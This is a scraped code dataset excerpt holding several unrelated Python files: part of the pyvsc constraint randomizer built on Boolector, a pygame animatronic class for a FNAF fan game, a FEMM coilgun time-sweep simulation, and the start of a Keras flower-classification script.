Exception as e:\n from ..visitors.model_pretty_printer import ModelPrettyPrinter\n print(\"Exception: \" + ModelPrettyPrinter.print(c[0]))\n raise e\n\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n if btor.Sat() != btor.SAT:\n # All the soft constraints cannot be satisfied. We'll need to\n # add them incrementally\n if self.debug > 0:\n print(\"Note: some of the %d soft constraints could not be satisfied\" % len(soft_constraint_l))\n \n for c in soft_constraint_l:\n btor.Assume(c[1])\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n if btor.Sat() == btor.SAT:\n if self.debug > 0:\n print(\"Note: soft constraint %s (%d) passed\" % (\n self.pretty_printer.print(c[0]), c[0].priority))\n btor.Assert(c[1])\n else:\n if self.debug > 0:\n print(\"Note: soft constraint %s (%d) failed\" % (\n self.pretty_printer.print(c[0]), c[0].priority))\n else:\n # All the soft constraints could be satisfied. 
Assert them now\n if self.debug > 0:\n print(\"Note: all %d soft constraints could be satisfied\" % len(soft_constraint_l))\n for c in soft_constraint_l:\n btor.Assert(c[1])\n \n# btor.Sat()\n x = start_rs_i\n while x < rs_i:\n self.swizzler.swizzle(\n btor,\n ri.randsets()[x],\n bound_m)\n x += 1\n \n # Finalize the value of the field\n x = start_rs_i\n reset_v = DynamicExprResetVisitor()\n while x < rs_i:\n rs = ri.randsets()[x]\n for f in rs.all_fields():\n f.post_randomize()\n f.set_used_rand(False, 0)\n f.dispose() # Get rid of the solver var, since we're done with it\n f.accept(reset_v)\n# for f in rs.nontarget_field_s:\n# f.dispose()\n for c in rs.constraints():\n c.accept(reset_v)\n RandSetDisposeVisitor().dispose(rs)\n \n if self.debug > 0:\n print(\"Post-Randomize: RandSet[%d]\" % x)\n for f in all_fields:\n if f in bound_m.keys():\n print(\" Field: %s %s\" % (f.fullname, str(f.val.val)))\n else:\n print(\" Field: %s (unbounded) %s\" % (f.fullname, str(f.val.val)))\n \n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n \n x += 1\n \n \n end = int(round(time.time() * 1000))\n\n def swizzle_randvars(self, \n btor : Boolector, \n ri : RandInfo,\n start_rs : int,\n end_rs : int,\n bound_m : Dict[FieldModel,VariableBoundModel]):\n\n # TODO: we must ignore fields that are otherwise being controlled\n if self.debug > 0:\n print(\"--> swizzle_randvars\")\n\n rand_node_l = []\n rand_e_l = []\n x=start_rs\n swizzled_field = False\n while x < end_rs:\n # For each random variable, select a partition with it's known \n # domain and add the corresponding constraint\n rs = ri.randsets()[x]\n field_l = rs.rand_fields()\n \n if self.debug > 0:\n print(\" \" + str(len(field_l)) + \" fields in randset\")\n \n if rs.rand_order_l is not None:\n # Perform an ordered randomization\n for ro_l in rs.rand_order_l:\n swizzled_field |= self.swizzle_field_l(ro_l, rs, bound_m, btor)\n else:\n swizzled_field |= self.swizzle_field_l(rs.rand_fields(), rs, bound_m, btor)\n \n x += 1\n \n if not swizzled_field:\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n btor.Sat()\n \n if self.debug > 0:\n print(\"<-- swizzle_randvars\")\n \n def swizzle_field_l(self, field_l, rs, bound_m, btor):\n e = None\n if len(field_l) > 0:\n # Make a copy of the field list so we don't\n # destroy the original\n field_l = field_l.copy()\n \n swizzle_node_l = []\n swizzle_expr_l = []\n max_swizzle = 4\n\n # Select up to `max_swizzle` fields to swizzle \n for i in range(max_swizzle):\n if len(field_l) > 0:\n field_idx = self.randint(0, len(field_l)-1)\n f = field_l.pop(field_idx)\n e = self.swizzle_field(f, rs, bound_m)\n if e is not None:\n swizzle_expr_l.append(e)\n swizzle_node_l.append(e.build(btor))\n else:\n break\n \n while len(swizzle_node_l) > 0:\n # Start by assuming all\n for n in swizzle_node_l:\n btor.Assume(n)\n\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n if btor.Sat() != btor.SAT:\n e = swizzle_expr_l.pop()\n n = swizzle_node_l.pop()\n if self.debug > 0:\n print(\"Randomization constraint failed. Removing last: %s\" %\n self.pretty_printer.print(e))\n else:\n # Randomization constraints succeeded. 
Go ahead and assert\n for n in swizzle_node_l:\n btor.Assert(n)\n break\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n if btor.Sat() != btor.SAT:\n raise Exception(\"failed to add in randomization (2)\") \n return True\n else:\n return False\n \n \n def swizzle_field(self, f, rs, bound_m) -> ExprModel:\n ret = None\n \n if self.debug > 0:\n print(\"Swizzling field %s\" % f.name)\n \n if f in rs.dist_field_m.keys():\n if self.debug > 0:\n print(\"Note: field %s is in dist map\" % f.name)\n for d in rs.dist_field_m[f]:\n print(\" Target interval %d\" % d.target_range)\n if len(rs.dist_field_m[f]) > 1:\n target_d = self.randint(0, len(rs.dist_field_m[f])-1)\n dist_scope_c = rs.dist_field_m[f][target_d]\n else:\n dist_scope_c = rs.dist_field_m[f][0]\n \n target_w = dist_scope_c.dist_c.weights[dist_scope_c.target_range]\n if target_w.rng_rhs is not None:\n # Dual-bound range\n val_l = target_w.rng_lhs.val()\n val_r = target_w.rng_rhs.val()\n val = self.randint(val_l, val_r)\n if self.debug > 0:\n print(\"Select dist-weight range: %d..%d ; specific value %d\" % (\n int(val_l), int(val_r), int(val)))\n ret = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(val, f.is_signed, f.width))\n else:\n # Single value\n val = target_w.rng_lhs.val()\n ret = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(int(val), f.is_signed, f.width))\n else:\n if f in bound_m.keys():\n f_bound = bound_m[f]\n if not f_bound.isEmpty():\n ret = self.create_rand_domain_constraint(f, f_bound)\n \n return ret\n# if e is not None:\n# n = e.build(btor)\n# rand_node_l.append(n)\n# rand_e_l.append(e)\n \n def create_rand_domain_constraint(self, \n f : FieldScalarModel, \n bound_m : VariableBoundModel)->ExprModel:\n e = None\n range_l = bound_m.domain.range_l\n range_idx = self.randint(0, len(range_l)-1)\n range = range_l[range_idx]\n domain = range[1]-range[0]\n \n \n if self.debug > 0:\n print(\"create_rand_domain_constraint: \" + f.name + \" range_idx=\" + str(range_idx) + \" range=\" + str(range))\n if domain > 64:\n r_type = self.randint(0, 3)\n r_type = 3 # Note: hard-coded to selecting single value for \n single_val = self.randint(range[0], range[1])\n \n if r_type >= 0 and r_type <= 2: # range\n # Pretty simple. 
Partition and randomize\n# bin_sz_h = 1 if int(domain/128) == 0 else int(domain/128)\n bin_sz_h = 1 if int(domain/128) == 0 else int(domain/128)\n\n if r_type == 0: \n # Center value in bin\n if single_val+bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val+bin_sz_h\n min = single_val-bin_sz_h\n \n if self.debug > 0:\n print(\"rand_domain range-type is bin center value: center=%d => %d..%d\" % (single_val,min,max))\n elif r_type == 1:\n # Bin starts at value\n if single_val+2*bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-2*bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val+2*bin_sz_h\n min = single_val\n if self.debug > 0:\n print(\"rand_domain range-type is bin left-target value: left=%d %d..%d\" % (single_val, min,max))\n elif r_type == 2:\n # Bin ends at value\n if single_val+2*bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-2*bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val\n min = single_val-2*bin_sz_h\n \n if self.debug > 0:\n print(\"rand_domain range-type is bin right-target value: left=%d %d..%d\" % (single_val, min,max))\n \n e = ExprBinModel(\n ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Ge,\n ExprLiteralModel(\n min,\n f.is_signed, \n f.width)\n ),\n BinExprType.And,\n ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Le,\n ExprLiteralModel(\n max,\n f.is_signed, \n f.width)\n )\n )\n elif r_type == 3: # Single value\n if self.debug > 0:\n print(\"rand_domain range-type is single value: %d\" % single_val)\n e = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(single_val, f.is_signed, f.width))\n else:\n val = self.randint(range[0], range[1])\n if self.debug > 0:\n print(\"rand_domain on small domain [%d..%d] => %d\" % (range[0], range[1], val))\n e = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(val, f.is_signed, f.width))\n\n return e\n \n def randint(self, low, high):\n if low > high:\n tmp = low\n low = high\n high = tmp\n\n return random.randint(low,high)\n\n def randbits(self, nbits):\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n# return Randomizer._rng.randint(0, (1<> 9))\n# ^ Randomizer._state_p[1] ^ (Randomizer._state_p[1] << 14))\n# Randomizer._state_p[1] = (Randomizer._state_p[1] << 36) | (Randomizer._state_p[1] >> 28)\n \n return ret\n\n def create_diagnostics_1(self, active_randsets) -> str:\n ret = \"\"\n \n btor = Boolector()\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n model_valid = False\n \n diagnostic_constraint_l = [] \n diagnostic_field_l = []\n \n # First, determine how many randsets are actually failing\n i = 0\n while i < len(active_randsets):\n rs = active_randsets[i]\n for f in rs.all_fields():\n f.build(btor)\n\n # Assume that we can omit all soft constraints, since they\n # will have already been omitted (?) 
\n constraint_l = list(map(lambda c:(c,c.build(btor)), filter(lambda c:not isinstance(c,ConstraintSoftModel), rs.constraints())))\n \n for c in constraint_l:\n btor.Assume(c[1])\n\n if btor.Sat() != btor.SAT:\n # Save fields and constraints if the randset doesn't \n # solve on its own\n diagnostic_constraint_l.extend(constraint_l)\n diagnostic_field_l.extend(rs.fields())\n \n i += 1\n \n\n problem_constraints = []\n solving_constraints = []\n # Okay, now perform a series of solves to identify\n # constraints that are actually a problem\n for c in diagnostic_constraint_l:\n btor.Assume(c[1])\n model_valid = False\n \n if btor.Sat() != btor.SAT:\n # This is a problematic constraint\n # Save it for later\n problem_constraints.append(c[0])\n else:\n # Not a problem. Assert it now\n btor.Assert(c[1])\n solving_constraints.append(c[0])\n model_valid = True\n# problem_constraints.append(c[0])\n \n if btor.Sat() != btor.SAT:\n raise Exception(\"internal error: system should solve\")\n \n # Okay, we now have a constraint system that solves, and\n # a list of constraints that are a problem. We want to \n # resolve the value of all variables referenced by the \n # solving constraints so and then display the non-solving\n # constraints. This will (hopefully) help highlight the\n # reason for the failure\n for c in solving_constraints:\n c.accept(RefFieldsPostRandVisitor())\n\n ret += \"Problem Constraints:\\n\"\n for i,pc in enumerate(problem_constraints):\n\n ret += \"Constraint %d: %s\\n\" % (i, SourceInfo.toString(pc.srcinfo))\n ret += ModelPrettyPrinter.print(pc, print_values=True)\n ret += ModelPrettyPrinter.print(pc, print_values=False)\n\n for rs in active_randsets:\n for f in rs.all_fields():\n f.dispose()\n \n return ret\n\n def create_diagnostics(self, active_randsets) -> str:\n \n btor = Boolector()\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n model_valid = False\n \n diagnostic_constraint_l = [] \n diagnostic_field_l = []\n \n # First, determine how many randsets are actually failing\n i = 0\n while i < len(active_randsets):\n rs = active_randsets[i]\n for f in rs.all_fields():\n f.build(btor)\n\n # Assume that we can omit all soft constraints, since they\n # will have already been omitted (?) \n constraint_l = list(map(lambda c:(c,c.build(btor)), filter(lambda c:not isinstance(c,ConstraintSoftModel), rs.constraints())))\n \n for c in constraint_l:\n btor.Assume(c[1])\n\n if btor.Sat() != btor.SAT:\n # Save fields and constraints if the randset doesn't \n # solve on its own\n diagnostic_constraint_l.extend(constraint_l)\n diagnostic_field_l.extend(rs.fields())\n \n i += 1\n \n problem_sets = []\n degree = 1\n \n while True:\n init_size = len(diagnostic_constraint_l)\n tmp_l = []\n\n ret = self._collect_failing_constraints(\n btor, \n diagnostic_constraint_l,\n 0, \n degree,\n tmp_l,\n problem_sets)\n \n if len(diagnostic_constraint_l) == init_size and degree > 3:\n break\n else:\n degree += 1\n\n if Randomizer.EN_DEBUG > 0:\n print(\"%d constraints remaining ; %d problem sets\" % (len(diagnostic_constraint_l), len(problem_sets)))\n\n # Assert the remaining constraints\n for c in diagnostic_constraint_l:\n btor.Assert(c[1])\n \n if btor.Sat() != btor.SAT:\n raise Exception(\"internal error: system should solve\")\n \n # Okay, we now have a constraint system that solves, and\n # a list of constraints that are a problem. 
We want to \n # resolve the value of all variables referenced by the \n # solving constraints so and then display the non-solving\n # constraints. This will (hopefully) help highlight the\n # reason for the failure\n \n ret = \"\"\n for ps in problem_sets:\n ret += (\"Problem Set: %d constraints\\n\" % len(ps))\n for pc in ps:\n ret += \" %s:\\n\" % SourceInfo.toString(pc[0].srcinfo)\n ret += \" %s\" % ModelPrettyPrinter.print(pc[0], print_values=False)\n\n pc = []\n for c in ps:\n pc.append(c[0])\n \n lint_r = LintVisitor().lint(\n [],\n pc)\n \n if lint_r != \"\":\n ret += \"Lint Results:\\n\" + lint_r\n \n for rs in active_randsets:\n for f in rs.all_fields():\n f.dispose()\n \n return ret \n \n def _collect_failing_constraints(self,\n btor,\n src_constraint_l,\n idx,\n max,\n tmp_l,\n fail_set_l):\n ret = False\n if len(tmp_l) < max:\n i = idx\n while i < len(src_constraint_l):\n tmp_l.append(i)\n ret = self._collect_failing_constraints(\n btor, src_constraint_l, i+1, max, tmp_l, fail_set_l)\n tmp_l.pop()\n if ret:\n src_constraint_l.pop(i)\n else:\n i += 1\n else:\n # Assume full set of collected constraints\n if Randomizer.EN_DEBUG:\n print(\"Assume: \" + str(tmp_l))\n for c in tmp_l:\n btor.Assume(src_constraint_l[c][1])\n if btor.Sat() != btor.SAT:\n # Set failed. Add to fail_set\n fail_s = []\n for ci in tmp_l:\n fail_s.append(src_constraint_l[ci])\n fail_set_l.append(tuple(fail_s))\n ret = True\n \n return ret\n\n \n @staticmethod\n def do_randomize(\n srcinfo : SourceInfo,\n field_model_l : List[FieldModel],\n constraint_l : List[ConstraintModel] = None,\n debug=0,\n lint=0,\n solve_fail_debug=0):\n if profile_on():\n solve_info = SolveInfo()\n solve_info.totaltime = time.time()\n randomize_start(srcinfo, field_model_l, constraint_l)\n else:\n solve_info = None\n \n # All fields passed to do_randomize are treated\n # as randomizable\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n# seed = Randomizer._rng.randint(0, (1 << 64)-1)\n \n seed = random.randint(0, (1<<64)-1)\n \n clear_soft_priority = ClearSoftPriorityVisitor()\n \n for f in field_model_l:\n f.set_used_rand(True, 0)\n clear_soft_priority.clear(f)\n \n if debug > 0: \n print(\"Initial Model:\") \n for fm in field_model_l:\n print(\" \" + ModelPrettyPrinter.print(fm))\n \n # First, invoke pre_randomize on all elements\n for fm in field_model_l:\n fm.pre_randomize()\n \n if constraint_l is None:\n constraint_l = []\n \n for c in constraint_l:\n clear_soft_priority.clear(c)\n\n # Collect all variables (pre-array) and establish bounds \n bounds_v = VariableBoundVisitor()\n bounds_v.process(field_model_l, constraint_l, False)\n\n # TODO: need to handle inline constraints that impact arrays\n constraints_len = len(constraint_l)\n for fm in field_model_l:\n constraint_l.extend(ArrayConstraintBuilder.build(\n fm, bounds_v.bound_m))\n # Now, handle dist constraints\n DistConstraintBuilder.build(seed, fm)\n \n for c in constraint_l:\n constraint_l.extend(ArrayConstraintBuilder.build(\n c, bounds_v.bound_m))\n # Now, handle dist constraints\n DistConstraintBuilder.build(seed, c)\n\n # If we made changes during array remodeling,\n # re-run bounds checking on the updated model\n# if len(constraint_l) != constraints_len:\n bounds_v.process(field_model_l, constraint_l)\n\n if debug > 0:\n print(\"Final Model:\") \n for fm in field_model_l:\n print(\" \" + ModelPrettyPrinter.print(fm))\n for c in constraint_l:\n print(\" \" + ModelPrettyPrinter.print(c, show_exp=True))\n\n# if lint > 
0:\n# LintVisitor().lint(\n# field_model_l,\n# constraint_l)\n \n\n r = Randomizer(\n solve_info=solve_info,\n debug=debug, \n lint=lint, \n solve_fail_debug=solve_fail_debug)\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n ri = RandInfoBuilder.build(field_model_l, constraint_l, Randomizer._rng)\n \n try:\n r.randomize(ri, bounds_v.bound_m)\n finally:\n # Rollback any constraints we've replaced for arrays\n if solve_info is not None:\n solve_info.totaltime = int((time.time() - solve_info.totaltime)*1000)\n randomize_done(srcinfo, solve_info)\n for fm in field_model_l:\n ConstraintOverrideRollbackVisitor.rollback(fm)\n \n for fm in field_model_l:\n fm.post_randomize()\n \n \n # Process constraints to identify variable/constraint sets\n \n","repo_name":"antmicro/pyvsc","sub_path":"src/vsc/model/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":35150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"}
{"seq_id":"18074934424","text":"import pygame, random\nfrom abc import ABC\n\nclass Animatronic(ABC):\n def __init__(self, aggresivity:int, locationId:int, jumpscare_animation:list, rest_room:int, custom_index:int):\n \"\"\"\n locationId:\n - From 1 to 12 are room locations\n - Greater than 100 are office locations\n 101: Office hallway\n 102: Right vent\n 103: Left vent\n 104: In Office Desk\n 0: Rest after attacking\n\n \"\"\"\n\n\n self.locationId = locationId\n self.secondPositionId = 1\n self.timer = pygame.time.get_ticks()\n self.changing_position:bool = False\n self.action_error:bool = False # When the animatronic is moving\n self._previous_movement = [] # The changing and the location\n self._jumpscare:bool = False\n self.jumpscare_animation = jumpscare_animation\n self._gameOver = False\n self.occupied_camera_time = 5000\n self.inOfficeDesk:bool = False # If the animatronic is in office to attack\n self.name_id:str = \"-\"\n self._prepare_to_jumpscare = False # Get a random timer and jumpscare the player\n self.jumpscare_wait_time = random.randint(2000, 12000)\n self.time_with_mask_goal = 120\n self.time_with_mask = 0\n self.rest_room = rest_room # The room where the animatronic rests after a screamer attempt\n self.aggresivity = aggresivity\n self._base_movement_time = 50_000\n self.vent_time_to_scare = 0\n self.movement_time = self._base_movement_time\n self.custom_index = custom_index # For custom night\n self.noise_timer = pygame.time.get_ticks()\n self.time_to_make_noise = 18_000\n\n # Available animatronics with the same room position\n self.aveliable_rooms_positions = {\n 101: [[\"FOXY\", \"WITHERED_BONNIE\"], [\"FOXY\", \"MANGLE\"], [\"TOY_FREDDY\"]],\n 10 : [[\"BALOON_BOY\", \"TOY_FREDDY\"]],\n 9 : [[\"FOXY\", \"WITHERED_FREDDY\", \"WITHERED_BONNIE\", \"WITHERED_CHICA\"]]\n }\n\n def jumpscare_update(self, App):\n if self.aggresivity != 0:\n if self._jumpscare:\n self.jumpscare_animation.update(App.surface)\n App.objects.open_monitor_button.quitting_camera = True\n App.objects.mask_button.quitting_mask = True\n if self.jumpscare_animation.sprite_num == len(self.jumpscare_animation.sprites) - 1:\n self._gameOver = True\n\n def update_movement_time(self):\n self.movement_time = self._base_movement_time\n self.movement_time -= (self.aggresivity*157)\n self.vent_time_to_scare = (self.movement_time*1.3) / (self.aggresivity + 1)\n\n def update(self, App):\n self.update_movement_time()\n if self.aggresivity != 0: \n if not self._jumpscare:\n if self._prepare_to_jumpscare:\n self.jumpscare_time(App)\n else:\n self.movement(App)\n\n # Static to camera\n if self.changing_position:\n self._change_occupied_camera_or_office(App, True)\n elif not self.changing_position and self.action_error:\n self._change_occupied_camera_or_office(App, False)\n self.action_error = False\n \n self.animatrionic_movement_sounds(App)\n\n # If in room 0\n if self.locationId == 0 and self.rest_room != None:\n self.change_location_id(App, self.rest_room)\n\n def animatrionic_movement_sounds(self, App):\n if pygame.time.get_ticks() - self.noise_timer > self.time_to_make_noise:\n if not(self.name_id == \"BALOON_BOY\" or self.name_id == \"MANGLE\"):\n if self.locationId == 5 or self.locationId == 6:\n App.assets.vents_sounds.play()\n\n elif self.changing_position:\n ran = random.randint(0, len(App.assets.walk_sounds) - 1)\n App.assets.walk_sounds[ran].play()\n elif self.name_id == \"BALOON_BOY\":\n if not self.locationId == -1:\n if self.changing_position:\n ran = random.randint(0, 3)\n if ran == 3:\n App.assets.baloon_laugh.play()\n else:\n App.assets.baloon_noises[ran].play()\n\n elif self.name_id == \"MANGLE\":\n if not self.locationId == -1 and not self.locationId == 6:\n if self.changing_position:\n App.assets.metal_run_sound.play()\n\n\n self.noise_timer = pygame.time.get_ticks()\n\n def jumpscare_time(self, App):\n if pygame.time.get_ticks() - self.timer > self.jumpscare_wait_time and App.objects.open_monitor_button.inCamera and not App.objects.office.animatronic_in_office:\n self.jumpscare(App)\n\n def _change_occupied_camera_or_office(self, App, state:bool):\n \"\"\" Change occupied camera and office \"\"\"\n # If previous_movement is below 100 it's a camera\n if self._previous_movement[0] -1 < 100:\n App.objects.camera.occupied_camera[self._previous_movement[0] - 1] = state # Camera\n else:\n App.objects.office.occupied_office[self._previous_movement[0] - 101] = state # Office\n\n if self._previous_movement[1] -1 < 100:\n App.objects.camera.occupied_camera[self._previous_movement[1] - 1] = state # Camera\n else:\n App.objects.office.occupied_office[self._previous_movement[1] - 101] = state # Office\n\n def movement(self, App):\n pass\n\n def verify_free_room(self, App, room_location:int):\n animatrionics_in_room = App.objects.Animatronics.every_animatrionic_position[room_location]\n if animatrionics_in_room == []: return True\n\n if not room_location in list(self.aveliable_rooms_positions.keys()):\n for animatrionic in animatrionics_in_room:\n if animatrionic.name_id != self.name_id:\n return False\n\n return True\n else:\n found_match = False\n for animatrionic in animatrionics_in_room:\n for aveliable_pos in self.aveliable_rooms_positions[room_location]:\n found_match = False\n for name in aveliable_pos:\n print(name)\n if animatrionic.name_id == name:\n found_match = True\n else:\n break\n\n if found_match: break\n if found_match: break\n\n if found_match and self.name_id in aveliable_pos:\n return True\n return False\n\n def change_location_id(self ,App, room_location:int, secondPositionId=1, forced=False):\n changing_to_location = room_location\n changing_to_position = secondPositionId\n self._previous_movement = [changing_to_location, self.locationId, changing_to_position, self.secondPositionId]\n\n if (changing_to_location == 104 or changing_to_location == -1 or changing_to_location == 0):\n self.changing_position = True\n self._wait_movement_time(force=True)\n else:\n self._wait_movement_time()\n is_free_room = self.verify_free_room(App, room_location)\n \n \"\"\"print(f\"free-room ({self.name_id}): {is_free_room}, force: {forced}\")\n print(\"its me! it works!\")\n print(App.objects.Animatronics.every_animatrionic_position[room_location])\n print(self.aveliable_rooms_positions)\"\"\"\n \n # If it's empty or it's forced\n if forced or is_free_room:\n if not self.changing_position:\n self.locationId = changing_to_location\n self.secondPositionId = changing_to_position\n changing_to_location = -1\n self.time_with_mask = 0\n else:\n # We need more time !\n self.timer = pygame.time.get_ticks()\n self.changing_position = False\n\n def _wait_movement_time(self, force=False):\n \"\"\" Will provoke the static while moving \"\"\"\n if not self.changing_position:\n self.timer = pygame.time.get_ticks()\n self.changing_position = True\n self.action_error = True\n\n elif self.changing_position:\n if not force:\n time_to_change = self.occupied_camera_time/self.aggresivity\n else:\n time_to_change = 0\n\n if pygame.time.get_ticks() - self.timer > time_to_change:\n self.changing_position = False\n self.timer = pygame.time.get_ticks()\n\n def isGameOver(self):\n return self._gameOver\n\n def get_prev_movement(self):\n if self.action_error and self.changing_position == False:\n self.prev_copy = self._previous_movement\n self._previous_movement = [-1, -1]\n self.action_error = False\n return self.prev_copy\n return [-1 , -1]\n\n def jumpscare(self, App):\n if not self._jumpscare and App.objects.Animatronics.every_animatrionic_position[104] == []:\n print(\"jump\")\n pygame.mixer.Channel(8).set_volume(1)\n pygame.mixer.Channel(8).play(App.assets.xScream1)\n self._jumpscare = True\n\n def prepare_to_jumpscare(self, App):\n self.change_location_id(App, -1, forced=True)\n self.timer = pygame.time.get_ticks()\n self._prepare_to_jumpscare = True\n\n def isBeingJumpscared(self): return self._jumpscare\n\n def return_to_rest_room(self, App):\n \"\"\" Changing to room 0 will immediately force the animatronic to change to the rest room \"\"\"\n self.change_location_id(App, 0, forced=True)","repo_name":"EDUATO/fnaf-in-pygame","sub_path":"files/animatronics/animatronic_base.py","file_name":"animatronic_base.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"37376362218","text":"import datetime\nimport femm\nimport matplotlib.pyplot as plt\nimport xlsxwriter as xl\nimport numpy as np\nimport os\n\n# TEST PARAMS --- Units in cm\n# filename = \"7mmCoil_192T_156A\"\nfilename = \"3.2mmCoil_100T_246A\"\n\ncurrent = 246\nsensorPos = 0.005\n\npos_start = -0.02 # starting position of front of projectile in meters\nmass = 0.018 # mass of projectile in Kg\n# length = 0.07 # projectile length in meters\nlength = 0.032\n\ntime_step = 1e-4 # time increments to use\ntime_stop = 5e-2 # time to stop simulation\nmaxStages = 9\n\n\n# set up FEMM stuff\nfemm.openfemm()\nfemm.opendocument('..\\\\'+ filename + \".fem\")\nfemm.mi_saveas('..\\\\'+\"temp_time.fem\")\nfemm.mi_seteditmode(\"group\")\n\n# set up data capture\nDateTime = datetime.datetime.now().strftime(\"%Y_%m_%d %H_%M\").replace('.', '-')\ndataDir = '..\\\\'+'Data\\\\TimeSweep ' + DateTime\nos.makedirs(dataDir, exist_ok=True)\nworkbook = xl.Workbook(dataDir + '\\\\' + filename + \".xlsx\")\nworksheet = workbook.add_worksheet()\n\nworksheet.write(0, 8, 'Mass [Kg]')\nworksheet.write(1, 8, mass)\n\nworksheet.write(0, 0, 'Time [s]')\nworksheet.write(0, 1, 'Stage #')\nworksheet.write(0, 2, 'Position wrt. 
Stage [cm]')\nworksheet.write(0, 3, 'Position [cm]')\nworksheet.write(0, 4, 'Velocity [m/s]')\nworksheet.write(0, 5, 'Acceleration [m/s^2]')\nworksheet.write(0, 6, 'Force [N]')\n\n# variable set up\ntime_list = list(np.arange(0.0, time_stop, time_step))\nz = [pos_start for i in range(len(time_list))] # position at end of timestep [m]\nz_tot = [pos_start for i in range(len(time_list))] # position at end of timestep [m]\nv = [0 for i in range(len(time_list))] # velocity at end of timestep [m/s]\na = [0 for i in range(len(time_list))] # Acceleration [m/s^2]\nf = [0 for i in range(len(time_list))] # Force in z-direction [N/Kg]\nstage = 0 # lets us pass the projectile through the coil multiple times\n\nfor i in range(1, len(time_list)): # start at 1 because initial conditions are zero and I want that to be reflected in data\n # worksheet.write(0, i + 1, str(round((iron_start + i * iron_step)*10)) + ' mm Force [N]')\n\n femm.mi_analyze()\n femm.mi_loadsolution()\n femm.mo_groupselectblock(1) # select group 1 (projectile)\n fz = femm.mo_blockintegral(19) # calculate force applied to projectile\n f[i] = fz\n\n # calculate kinematics stuffs\n a[i] = f[i]/mass\n v[i] = v[i-1] + a[i]*time_step\n z[i] = z[i-1] + v[i]*time_step\n z_tot[i] = z_tot[i-1] + v[i]*time_step\n\n if z[i] - length > -sensorPos:\n femm.mi_setcurrent('Coil', 0) # set coil current to 0 when back of projectile passes -0.5cm (light sensor location)\n if z[i] > length + sensorPos:\n # loop the projectile through identical coil\n femm.mi_setcurrent('Coil', current) # set current back to 156 A\n femm.mi_selectgroup(1)\n femm.mi_movetranslate(0, -(z[i] + sensorPos)*100)\n z[i] = -0.005\n stage += 1\n\n # move projectile forward\n femm.mi_selectgroup(1)\n femm.mi_movetranslate(0, v[i]*time_step * 100) # convert to cm\n\n worksheet.write(i, 0, round(time_list[i], 6))\n worksheet.write(i, 1, stage+1)\n worksheet.write(i, 2, round(z[i], 6))\n worksheet.write(i, 3, round(z_tot[i], 6))\n worksheet.write(i, 4, round(v[i], 6))\n worksheet.write(i, 5, round(a[i], 6))\n worksheet.write(i, 6, round(f[i], 6))\n print(\"Iteration # \" + str(i) + '\\tTime = ' + str(round(time_list[i], 6)) + '\\tz = ' + str(\n round(z[i], 6)) + '\\tv = ' + str(round(v[i], 6)) + '\\ta = ' + str(round(a[i], 6)))\n\n if stage >= maxStages:\n break\n\nplt.plot(time_list,f)\nplt.show()\nplt.plot(time_list,a)\nplt.show()\nplt.plot(time_list,v)\nplt.show()\nplt.plot(time_list,z)\nplt.show()\nfemm.closefemm()\nworkbook.close()","repo_name":"ThomasKulin/CG-490","sub_path":"FEMM Simulations/Scripting/coilgun_timeSweep.py","file_name":"coilgun_timeSweep.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12985833635","text":"#Dataset Augmentation?\n#Keras \n#Map, flat map?, mat. 
In preprocessing: create new dataset, randomly shuffle, flip, reducing the brightness\n\nimport tensorflow.compat.v2 as tf\nimport tensorflow_datasets as tfds\nfrom tensorflow import keras\nfrom preprocessDefinition import preprocess\nfrom functools import partial\n\ndataset, info = tfds.load(\"oxford_flowers102\", as_supervised=True, with_info=True)\ndataset_size = info.splits[\"train\"].num_examples\nclass_names = info.features[\"label\"].names\nn_classes = info.features[\"label\"].num_classes\n\nvalid_set = tfds.load('oxford_flowers102', split='validation',as_supervised=True) # 10% to 25%\ntrain_set = tfds.load('oxford_flowers102', split='train',as_supervised=True) #last 75% of train data\n\nbatch_size = 32\ntrain_set = train_set.shuffle(1000).repeat()\ntrain_set = train_set.map(partial(preprocess, randomize=True)).batch(batch_size).prefetch(1)\nvalid_set = valid_set.map(preprocess).batch(batch_size).prefetch(1)\n\nbase_model = keras.applications.xception.Xception(weights=\"imagenet\", include_top=False)\navg = 